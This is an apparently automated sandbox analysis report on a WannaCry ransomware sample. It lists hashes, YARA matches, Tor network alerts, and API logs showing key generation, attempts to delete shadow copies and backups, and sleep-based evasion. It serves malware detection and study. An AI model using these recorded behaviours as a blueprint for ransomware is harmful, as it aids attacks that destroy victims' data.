popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

WannaCry.exe

Suspicious_Script_Bin Generic Malware Malicious Library Downloader Admin Tool (Sysinternals etc ...) Antivirus UPX Code injection DGA HTTP Hijack Network Create Service Sniff Audio Internet API DNS Http API ScreenShot Steal credential Socket PWS BitCoin
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 June 19, 2023, 4:16 p.m. June 19, 2023, 4:18 p.m.
Size 3.4MB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 84c82835a5d21bbcf75a61706d8ab549
SHA256 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa
CRC32 4022FCAA
ssdeep 98304:QqPoBhz1aRxcSUDk36SAEdhvxWa9P593R8yAVp2g3x:QqPe1Cxcxk3ZAEUadzR8yc4gB
Yara
  • UPX_Zero - UPX packed file
  • Malicious_Library_Zero - Malicious_Library
  • IsPE32 - (no description)
  • PE_Header_Zero - PE File Signature

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
163.172.13.165 Active Moloch
164.124.101.2 Active Moloch
171.25.193.9 Active Moloch
193.11.164.243 Active Moloch
81.7.10.93 Active Moloch
89.147.109.179 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 193.11.164.243:9001 -> 192.168.56.101:49183 2522343 ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 344 Misc Attack
TCP 192.168.56.101:49183 -> 193.11.164.243:9001 2028377 ET JA3 Hash - Possible Malware - Malspam Unknown Traffic
TCP 89.147.109.179:443 -> 192.168.56.101:49200 2522795 ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 796 Misc Attack
TCP 193.11.164.243:9001 -> 192.168.56.101:49183 2018789 ET POLICY TLS possible TOR SSL traffic Misc activity
TCP 192.168.56.101:49200 -> 89.147.109.179:443 2028377 ET JA3 Hash - Possible Malware - Malspam Unknown Traffic
TCP 171.25.193.9:80 -> 192.168.56.101:49184 2522270 ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 271 Misc Attack
TCP 192.168.56.101:49184 -> 171.25.193.9:80 2028377 ET JA3 Hash - Possible Malware - Malspam Unknown Traffic
TCP 171.25.193.9:80 -> 192.168.56.101:49184 2018789 ET POLICY TLS possible TOR SSL traffic Misc activity

Suricata TLS

Flow Issuer Subject Fingerprint
TLS 1.2
192.168.56.101:49183
193.11.164.243:9001 		CN=www.4wd6i4yj2bf.com CN=www.un744uplalol4b6y2.net 5c:6e:3b:08:5f:a9:ee:51:db:11:bf:b3:1e:a7:35:86:65:a8:d6:d4
TLS 1.2
192.168.56.101:49200
89.147.109.179:443 		CN=www.gglks3sz.com CN=www.jd7d2yfbp5v.net 05:87:c0:34:cb:76:9e:89:a3:0e:18:ec:b9:8d:19:57:90:5f:18:9e
TLS 1.2
192.168.56.101:49184
171.25.193.9:80 		CN=www.hdvpy7r4rywlcaqdia4k.com CN=www.vt7d6yxmxd4wr2zppe.net 07:3d:9a:29:9e:68:46:c6:c8:e6:49:b1:61:d5:e1:4c:30:05:5a:c0

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: Successfully processed 183 files; Failed processing 0 files
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: The batch file cannot be found.
console_handle: 0x0000000b
1 1 0

WriteConsoleA

 buffer: Jun 19 22:57:08.427 [notice] Tor 0.2.9.10 (git-1f6c8eda0073f464) running on Windows 7 with Libevent 2.0.22-stable, OpenSSL 1.0.2k and Zlib 1.2.8.
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Jun 19 22:57:08.443 [notice] Tor can't help you if you use it wrong! Learn how to be safe at https://www.torproject.org/download/download#warning
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Jun 19 22:57:08.443 [notice] Configuration file "C:\Users\test22\AppData\Roaming\tor\torrc" not present, using reasonable defaults.
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Jun 19 22:57:08.458 [warn] Path for GeoIPFile (<default>) is relative and will resolve to C:\Users\test22\AppData\Local\Temp\<default>. Is this what you wanted?
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Jun 19 22:57:08.458 [warn] Path for GeoIPv6File (<default>) is relative and will resolve to C:\Users\test22\AppData\Local\Temp\<default>. Is this what you wanted?
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Jun 19 22:57:08.458 [notice] Opening Socks listener on 127.0.0.1:9050
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Jun 19 22:57:08.000 [notice] Bootstrapped 0%: Starting
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Jun 19 22:57:10.000 [notice] Bootstrapped 5%: Connecting to directory server
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Jun 19 22:57:10.000 [notice] Bootstrapped 10%: Finishing handshake with directory server
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Jun 19 22:57:11.000 [notice] Bootstrapped 15%: Establishing an encrypted directory connection
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Jun 19 22:57:11.000 [notice] Bootstrapped 20%: Asking for networkstatus consensus
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Jun 19 22:57:11.000 [notice] Bootstrapped 25%: Loading networkstatus consensus
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Jun 19 22:57:14.000 [warn] Received directory with skewed time (DIRSERV:171.25.193.9:80): It seems that our clock is ahead by 6 hours, 39 minutes, or that theirs is behind. Tor requires an accurate clock to work: please check your time, timezone, and date settings.
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Jun 19 22:57:15.000 [notice] I learned some more directory information, but not enough to build a circuit: We have no usable consensus.
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Jun 19 22:57:15.000 [notice] Bootstrapped 40%: Loading authority key certs
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Jun 19 22:57:16.000 [warn] Received directory with skewed time (DIRSERV:171.25.193.9:80): It seems that our clock is ahead by 6 hours, 40 minutes, or that theirs is behind. Tor requires an accurate clock to work: please check your time, timezone, and date settings.
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Jun 19 22:57:16.000 [warn] At least one protocol listed as recommended in the consensus is not supported by this version of Tor. You should upgrade. This version of Tor will eventually stop working as a client on the Tor network. The missing protocols are: DirCache=2 HSDir=2 HSIntro=4 Link=4-5
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Jun 19 22:57:18.000 [notice] Bootstrapped 45%: Asking for relay descriptors
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Jun 19 22:57:18.000 [notice] I learned some more directory information, but not enough to build a circuit: We need more microdescriptors: we have 0/6833, and can only build 0% of likely paths. (We have 0% of guards bw, 0% of midpoint bw, and 0% of exit bw = 0% of path bw.)
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Jun 19 22:57:20.000 [notice] Bootstrapped 50%: Loading relay descriptors
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Jun 19 22:57:55.000 [notice] Bootstrapped 55%: Loading relay descriptors
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Jun 19 22:57:56.000 [notice] Bootstrapped 62%: Loading relay descriptors
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Jun 19 22:57:57.000 [notice] Bootstrapped 72%: Loading relay descriptors
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Jun 19 22:57:58.000 [notice] Bootstrapped 80%: Connecting to the Tor network
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Jun 19 22:57:58.000 [notice] Bootstrapped 90%: Establishing a Tor circuit
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Jun 19 22:58:00.000 [notice] Tor has successfully opened a circuit. Looks like client functionality is working.
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Jun 19 22:58:00.000 [notice] Bootstrapped 100%: Done
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Jun 19 22:58:15.000 [warn] Received http status code 404 ("Not found") from server '89.147.109.179:443' while fetching "/tor/keys/fp/D586D18309DED4CD6D57C18FDB97EFA96D330566+EFCBE720AB3A82B99F9E953CD5BF50F7EEFC7B97".
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: 'bcdedit' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: 'bcdedit' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: 'wbadmin' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool (C) Copyright 2001-2005 Microsoft Corp.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: Error: Unexpected failure: Class not registered
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: ERROR: Description = Initialization failure
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: The operation completed successfully.
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

CryptGenKey

 crypto_handle: 0x00b77b50
algorithm_identifier: 0x00000001 ()
flags: 134217729
key:
provider_handle: 0x00b6dbb8
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00b77b50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: ¤RSA1ÍhMC ³EÔr„1&!€TÜòÈXò?ý{bN;5ðD6~çdڕbÉÆäyÝڝçNµc)µï×3)¯Úq¼/˹~Qê¨B åõñ\Ž+¹fžø˜ܜð­Ð¢¿#I`2bOë©bAØaýæ'6yŸß%oŠ­ ‚Ö&¸ÀÈu݋ù­<ÙÄ\¬×Š ‘0CË' N±fcp–<˳l=[dµ9òFÉ 2C ]‚¤éÐ„È òs%TÉAÕåÅHc‘á ZÕÏwP.›y篥äÏÕ^ä*Æؓ©Óhó 2è¹²já”ՐüßFY3dŸXüÿj¤Õè҄Á¿
crypto_handle: 0x00b77b50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: ¤RSA2ÍhMC ³EÔr„1&!€TÜòÈXò?ý{bN;5ðD6~çdڕbÉÆäyÝڝçNµc)µï×3)¯Úq¼/˹~Qê¨B åõñ\Ž+¹fžø˜ܜð­Ð¢¿#I`2bOë©bAØaýæ'6yŸß%oŠ­ ‚Ö&¸ÀÈu݋ù­<ÙÄ\¬×Š ‘0CË' N±fcp–<˳l=[dµ9òFÉ 2C ]‚¤éÐ„È òs%TÉAÕåÅHc‘á ZÕÏwP.›y篥äÏÕ^ä*Æؓ©Óhó 2è¹²já”ՐüßFY3dŸXüÿj¤Õè҄Á¿;ØsüiKùޓ¤÷Ìy‚íeb;ŠD‡ðîMÝÿìȈa͕ٔ]G¹­WéÓ7Ǔfš Ö£U7¥GÕÝÝõÇ@R'+úK¾¿èq•¾G•¢¤FŽ”¹½dTÃrþWÂv¬…zJ‰t¥æÔ/¹ÑÿðÖ& <¿÷\–ð)~¦ç…jx.êÙÉþ—ººï’ÖŒŒK÷þ˜z¿Æ†Fì(üøYÑJÚq`···žyF™‡¥êÒÄz”sÝQTŸqúÛ$¶ò!Ƕ°VœAõC¦rºÓ"DŽ“™n¾‡iãë€äý+tãq®#„t¬æãa]e]ÈÑÔ.Qódí_ÓùýùŽ3î )ñªÀt¦»ÿñÅþfæ6T«ä¤ÍYQ Çúc²Æzšˆ=ø‘9Ϗ]‘Œ{ q pz@Ø3?ZùwˆÞdCM.RËcøï,4Ú·0¥©%t±-Ž*88ÏJ—˜aÕ,µÄ7[LïÐF‰fð{Ô·‚Z(q*fw£4¦MEk”Îí†={iª‹7A9£r®‚Üéô¦=Éúp‘„Û§y¬ ν@ǓK&ž·°ñŸ÷ÌuäÃã|x~qÕø²; .Ÿj‹>¦dhÓv@Ëkóîìš ß}³(^ȁY«xÍ) øOâ¦ªÖ l»Œ ̂›¢òGö‡é> ¯Að“`Âî/›™‡©%/Ï›ðºß¿ûQ»ÔzIۂaw’çàjÈcÕfmzOP¸¡xÑvþæ6Žíu¡K¹žà_óŠ4=ú?•:víu¨YÔíñÀÐ ÏÔϗC¯±Pp¸3‹w›¼úṈómVN$@u{OÎx+k¤´ŠAøhÈcý»JÕ½»~'DÜã™ÑšÇ§CÞVrëÏ Íäñ/OãB˜Œ+¤&ê+ªʶT†!ȯIV¿ûcë^¶ ¥’Õ±oµÒ­T¥ó̌մæ°æûá8äÒâîa®¦3zÂÊÁÏf<«>δ¸þ¦ØǙb1&¾Ÿ¨è¾]e2 ÝiBÀ4ˆTÐÃͨƒŒ¼\ Ž¹¿€‚ÖÕå~dk[£Ö½G6™o—aåMtK%õ@ð갆®"•¶Ñ '˜vpoc\# ûcMé͸ÇSЁìÉ¡ì½Ö*2!ñVd¦~Ì»ïNП:Ëqcl™³wáŸÒBŸ€ù®Ô…›Á
crypto_handle: 0x00b77b50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 7
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
packer Armadillo v1.71
resource name XIA
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
IWICColorContext_InitializeFromMemory_Proxy+0x37187 windowscodecs+0xd8660 @ 0x736a8660
WICConvertBitmapSource+0x2472b WICMapGuidToShortName-0x10e74 windowscodecs+0x8f797 @ 0x7365f797
DllGetClassObject+0x12362 WICSerializeMetadataContent-0x7277 windowscodecs+0x23362 @ 0x735f3362
DllGetClassObject+0x118b1 WICSerializeMetadataContent-0x7d28 windowscodecs+0x228b1 @ 0x735f28b1
DllGetClassObject+0x11788 WICSerializeMetadataContent-0x7e51 windowscodecs+0x22788 @ 0x735f2788
DllGetClassObject+0x12659 WICSerializeMetadataContent-0x6f80 windowscodecs+0x23659 @ 0x735f3659
DllGetClassObject+0x8e24 WICSerializeMetadataContent-0x107b5 windowscodecs+0x19e24 @ 0x735e9e24
DllGetClassObject+0x8c6d WICSerializeMetadataContent-0x1096c windowscodecs+0x19c6d @ 0x735e9c6d
iconcodecservice+0x14c8 @ 0x742114c8
SetKeyboardState+0xe587 CliImmSetHotKey-0x52d4 user32+0x4fa39 @ 0x7588fa39
LookupIconIdFromDirectoryEx+0x362 DdeCreateDataHandle-0x622 user32+0x2f316 @ 0x7586f316
CopyImage+0x4f SetWindowPlacement-0x5e user32+0x24a58 @ 0x75864a58
CopyImage+0xa3 SetWindowPlacement-0xa user32+0x24aac @ 0x75864aac
DdeConnectList+0xcec GetKeyNameTextW-0xc20 user32+0x5fb81 @ 0x7589fb81
KiUserCallbackDispatcher+0x2e KiUserExceptionDispatcher-0x1a ntdll+0x1011a @ 0x76f2011a
GetThemeBool+0x84e GetThemeTextExtent-0x1b5f uxtheme+0x16e9f @ 0x73bc6e9f
GetThemeBool+0x8c0 GetThemeTextExtent-0x1aed uxtheme+0x16f11 @ 0x73bc6f11
SystemParametersInfoW+0x40 GetWindowThreadProcessId-0xa1 user32+0x19113 @ 0x75859113
TaskStart-0xabc @ 0x10005024

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xc0000002
exception.offset: 46887
exception.address: 0x7597b727
registers.esp: 1625012
registers.edi: 11953384
registers.eax: 1625012
registers.ebp: 1625092
registers.edx: 5373
registers.ebx: 4094
registers.esi: 11952736
registers.ecx: 5374
1 0 0

__exception__

 stacktrace: 
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x75c5374b
CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x74724387
NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x75c4ef51
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x75c46a9c
NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x75c46b42
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x75c46a9c
NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x75c65c3a
NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x75ce06b8
WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x747fd7e6
WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x747fd876
WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x747fddd0
CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x74718a43
CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x74718938
DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x7471950a
WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x747fdccd
WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x747fdb41
WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x747fe1fd
DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x74719367
DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x74719326
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x758562fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75856d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x758577c4
DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x7585788a
CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x746da48b
CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x746d853b
CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x746da4ac
CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x746ecd48
CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x746ed87a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7597b727
registers.esp: 43708040
registers.edi: 4130524
registers.eax: 43708040
registers.ebp: 43708120
registers.edx: 53
registers.ebx: 43708404
registers.esi: 2147746133
registers.ecx: 3891536
1 0 0

__exception__

 stacktrace: 
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x75c5374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x747ff725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x75c6414b
ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x746cfe14
StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x747fa338
IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x761ae99f
IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x761872ed
RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x7617ab0d
IsValidURL+0x2235 MkParseDisplayNameEx-0x1effb urlmon+0x4c048 @ 0x761ac048
RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x761787f7
RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x76178926
RevokeBindStatusCallback+0x13ad CreateURLMoniker-0x4b1 urlmon+0x1d55e @ 0x7617d55e
IsValidURL+0x2638 MkParseDisplayNameEx-0x1ebf8 urlmon+0x4c44b @ 0x761ac44b
RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x7617d1f6
RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x7617d1ac
RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x7617d40b
RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x7617991b
RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x76178d67
RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x7617a0d8
RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x76179b85
RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x76179aa8
DllRegisterServer+0x14b2 msxml3+0x46f4f @ 0x72466f4f
DllRegisterServer+0x13a3 msxml3+0x46e40 @ 0x72466e40
DllGetClassObject+0x3536b DllCanUnloadNow-0x1017 msxml3+0x427a4 @ 0x724627a4
DllGetClassObject+0x35219 DllCanUnloadNow-0x1169 msxml3+0x42652 @ 0x72462652
DllGetClassObject+0x35104 DllCanUnloadNow-0x127e msxml3+0x4253d @ 0x7246253d
DllGetClassObject+0x34fd8 DllCanUnloadNow-0x13aa msxml3+0x42411 @ 0x72462411
DllGetClassObject+0x35172 DllCanUnloadNow-0x1210 msxml3+0x425ab @ 0x724625ab
wmic+0x39c80 @ 0xfc9c80
wmic+0x3b06a @ 0xfcb06a
wmic+0x3b1f8 @ 0xfcb1f8
wmic+0x36fcd @ 0xfc6fcd
wmic+0x3d6e9 @ 0xfcd6e9
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7597b727
registers.esp: 648560
registers.edi: 1953561104
registers.eax: 648560
registers.ebp: 648640
registers.edx: 1
registers.ebx: 3861212
registers.esi: 2147746133
registers.ecx: 726632172
1 0 0

__exception__

 stacktrace: 
IWICColorContext_InitializeFromMemory_Proxy+0x37187 windowscodecs+0xd8660 @ 0x736a8660
WICConvertBitmapSource+0x2472b WICMapGuidToShortName-0x10e74 windowscodecs+0x8f797 @ 0x7365f797
DllGetClassObject+0x12362 WICSerializeMetadataContent-0x7277 windowscodecs+0x23362 @ 0x735f3362
DllGetClassObject+0x118b1 WICSerializeMetadataContent-0x7d28 windowscodecs+0x228b1 @ 0x735f28b1
DllGetClassObject+0x11788 WICSerializeMetadataContent-0x7e51 windowscodecs+0x22788 @ 0x735f2788
DllGetClassObject+0x12659 WICSerializeMetadataContent-0x6f80 windowscodecs+0x23659 @ 0x735f3659
DllGetClassObject+0x8e24 WICSerializeMetadataContent-0x107b5 windowscodecs+0x19e24 @ 0x735e9e24
DllGetClassObject+0x8c6d WICSerializeMetadataContent-0x1096c windowscodecs+0x19c6d @ 0x735e9c6d
iconcodecservice+0x14c8 @ 0x742114c8
SetKeyboardState+0xe587 CliImmSetHotKey-0x52d4 user32+0x4fa39 @ 0x7588fa39
LookupIconIdFromDirectoryEx+0x362 DdeCreateDataHandle-0x622 user32+0x2f316 @ 0x7586f316
CopyImage+0x4f SetWindowPlacement-0x5e user32+0x24a58 @ 0x75864a58
CopyImage+0xa3 SetWindowPlacement-0xa user32+0x24aac @ 0x75864aac
DdeConnectList+0xcec GetKeyNameTextW-0xc20 user32+0x5fb81 @ 0x7589fb81
KiUserCallbackDispatcher+0x2e KiUserExceptionDispatcher-0x1a ntdll+0x1011a @ 0x76f2011a
GetThemeBool+0x84e GetThemeTextExtent-0x1b5f uxtheme+0x16e9f @ 0x73bc6e9f
GetThemeBool+0x8c0 GetThemeTextExtent-0x1aed uxtheme+0x16f11 @ 0x73bc6f11
SystemParametersInfoW+0x40 GetWindowThreadProcessId-0xa1 user32+0x19113 @ 0x75859113
@wanadecryptor@+0x7f6d @ 0x407f6d
0x1

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xc0000002
exception.offset: 46887
exception.address: 0x7597b727
registers.esp: 1626164
registers.edi: 5031984
registers.eax: 1626164
registers.ebp: 1626244
registers.edx: 16
registers.ebx: 4094
registers.esi: 5031336
registers.ecx: 17
1 0 0
Time & API Arguments Status Return Repeated

bind

 ip_address: 0.0.0.0
socket: 276
port: 0
1 0 0

bind

 ip_address: 0.0.0.0
socket: 292
port: 0
1 0 0

bind

 ip_address: 0.0.0.0
socket: 276
port: 0
1 0 0

bind

 ip_address: 0.0.0.0
socket: 292
port: 0
1 0 0

bind

 ip_address: 127.0.0.1
socket: 348
port: 0
1 0 0

listen

 socket: 348
backlog: 1
1 0 0

accept

 ip_address: 127.0.0.1
socket: 348
port: 49182
1 416 0

bind

 ip_address: 127.0.0.1
socket: 348
port: 9050
1 0 0

listen

 socket: 348
backlog: 2147483647
1 0 0

accept

 ip_address: 127.0.0.1
socket: 348
port: 49201
1 524 0

accept

 ip_address: 127.0.0.1
socket: 348
port: 49202
1 524 0

accept

 ip_address: 127.0.0.1
socket: 348
port: 49915
1 524 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2980
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73572000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1452
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000092f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 152
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72ce2000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2264
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72ce2000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2592
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 2347008
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00041000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 3012
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72411000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 284
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72ce2000
process_handle: 0xffffffff
1 0 0
description WannaCry.exe tried to sleep 802 seconds, actually delayed analysis time by 802 seconds
